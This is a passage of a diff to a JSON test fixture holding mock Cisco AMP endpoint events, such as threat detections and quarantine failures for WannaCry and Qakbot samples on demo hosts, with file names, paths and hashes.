found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline 
at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} 